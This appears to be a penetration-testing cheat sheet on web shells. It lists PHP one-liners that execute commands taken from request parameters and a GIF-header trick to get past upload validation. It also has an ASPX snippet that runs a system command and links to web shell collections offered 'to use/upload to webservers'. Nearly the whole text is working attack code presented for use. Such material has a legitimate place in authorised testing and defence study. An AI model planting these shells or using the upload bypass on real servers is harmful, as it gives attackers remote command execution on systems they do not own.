#
Web Shells
#
PHP
#
Interactive PHP web shell
#
Simple PHP RCE
<?php
system($_GET['cmd']);
?>
Using REQUEST we can use a POST. (POST use less bad characters!)
<?php system($_REQUEST['cmd']); ?>
Bypass file validation with GIF header:
GIF8;<?php system($_REQUEST['cmd']); ?>
#
ASPX
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c whoami")
o = cmd.StdOut.Readall()
Response.write(o)
%>
#
Collections
A collection of webshells to use/upload to webservers:
https://github.com/tennc/webshell
https://github.com/xl7dev/WebShell